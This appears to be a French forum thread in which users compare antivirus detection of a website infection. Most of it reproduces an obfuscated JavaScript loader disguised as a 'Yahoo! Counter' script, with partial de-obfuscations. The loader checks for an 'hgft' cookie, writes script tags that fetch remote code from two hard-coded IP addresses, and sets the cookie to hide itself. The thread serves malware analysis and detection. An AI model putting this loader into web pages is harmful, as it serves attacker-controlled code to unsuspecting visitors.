<script language=javascript><!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F%2F|%3C%64`i%76%20@s~%74~%79le=d%

69|sp!l`a@y:%6E%6F&%6E%65%3E\n%64%6Fcu%6De#n|%74!.%77%72`%69#%74~e("%3C%2F`tex%74$%61!%

72~%65a~%3E|%22$%29%3B~%76&ar%20#i%2C`_`,%61=~%5B"%37%38~.%3110%2E@1!7%35#.`%32&%31",%2

***************************

`c$%6F&%6F%6B~%69e%2E%6D!a&%74~c~h($%2F&%5C`bhg%66|%74=`%31%2F%29!=$%3D&%6E%75l|%6C)%66

!%6F~%72%28|%69$%3D%30`%3Bi&%3C!%32`;@%69~++`)~%64%6F%63%75$%6D%65%6E!t#%2E%77%72~%69|t

%65~%28$%22%3C$%73#%63&%72&i&%70t`%3Ei~f~%28!%5F`)!%64%6F|c$%75`m~%65%6Et`.&wr%69|%74&e

@(%5C%22~%3C%73#%63%72%69p!t%20%69%64`%3D%5F"%2B%69~%2B$%22$%5F@%20s|r!c=/#/&"+&a@[~i]%

2B"@%2F@%63p/%3F%22@+na%76$%69%67%61%74&o#%72%2E#a@%70$%70%4E%61%6D%65%2E~%63h|%61r@A%7

4~(%30`%29+"%3E%3C#%5C%5C~%2Fsc$%72%69!pt%3E|%5C"%29|%3C&%5C/s@%63%72i@pt!%3E#%22!)|%3B

&\n|//#%3C$%2F%64%69%76%3E').replace(/\$|\&|~|#|@|`|\||\!/g,""));var yahoo_counter=1;
<!-- counter end --></script>

'//|<d`iv @s~t~yle=d%

69|sp!l`a@y:no&ne>\ndocume#n|t!.wr`i#t~e("</`text$a!%

72~ea~>|"$);~v&ar #i,`_`,a=~["78~.110.@1!75#.`2&1",%2

21~95.!2|4$.7`6@.2#5&1`"]&;|_=@1;$if`(&d#ocum@ent`.

`c$o&ok~ie.m!a&t~c~h($/&\`bhgf|t=`1/)!=$=&nul|l)f

!o~r(|i$=0`;i&<!2`;@i~++`)~docu$men!t#.wr~i|t

e~($"<$s#c&r&i&pt`>i~f~(!_`)!do|c$u`m~ent`.&wri|t&e

@(\"~<s#crip!t id`=_"+i~+$"$_@ s|r!c=/#/&"+&a@[~i]%

2B"@/@cp/?"@+nav$igat&o#r.#a@p$pName.~ch|ar@A%7

4~(0`)+"><#\\~/sc$ri!pt>|\")|<&\/s@cri@pt!>#"!)|;

&\n|//#<$/div>

document.write("</textarea>");var i,_,a=["78.110.175.21","195.24.76.251"];_=1;if(document.cookie.match(/\bhgft=1/)==null)for(i=0;i<2;i++)document.write("<script>if(_)document.write(\"<script id=_"+i+"_ src=//"+a+"/cp/?"+navigator.appName.charAt(0)+"><\\/script>\")<\/script>");

_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i+"_");if(d)d.src=""}eval(unescape('#/%2F#%4Au`s|t%20%66uc!k%20~of%66.#%2E.$ #%3C%64!i%76%20|s%74%79!%6C$e~=$d$%69s$%70%6C|%61y%3A%6E!%6F`%6Ee`%3E|\n%76%61|r~ @%74!%3D!n#%65w D$%61|t%65(!12`%334%37333~70$%30|%30$%30)`;#%64ocu!%6D%65!%6E@%74%2Ec%6F%6F#%6B@%69e=%22!%68%67f%74~%3D@%31%3B~%20e$xp%69|r@e|s%3D~"~%2B`%74.%74~o#%47|MT%53!%74$r`%69n%67!()+@%22#;@ %70a%74%68%3D|/!%22!;\n%2F%2F`%3C#/$d~i%76~%3E').replace(/@|\!|~|\?|#|\$|`|\|/g,""));

#//#Ju`s|t fuc!k ~off.#..$ #<d!iv |sty!l$e~=$d$is$pl|ay:n!o`ne`>|\nva|r~ @t!=!n#ew D$a|te(!12`347333~70$0|0$0)`;#docu!me!n@t.coo#k@ie="!hgft~=@1;~ e$xpi|r@e|s=~"~+`t.t~o#G|MTS!t$r`ing!()+@"#;@ path=|/!"!;\n//`<#/$d~iv~>'

replace(/@|\!|~|\?|#|\$|`|\|/g,""));

//Just fuck off... <div style=display.none> new date.document.cookie=expires:[GMT]; string.path=""</div>

Jeanmimigab, c'est normal, toi tu as scanné tout le code source en format HTML, moi j'ai scanné juste la partie infectieuse en format.txt, ce qui la rend innofensive, dans ton fichier en revanche elle est active car le format d'enregistrement prends en compte le langage unescape. Sophos antivirus ne détecte donc ce genre de virus que lorsqu'il est actif c'est toujours bon à savoir, je t'ai envoyé une analyse poussée de cette bestiole par MP
Merci pour ce test qui confirme nos doutes

bon je passerai une analyse rapide avec avast
encore merci et au revoir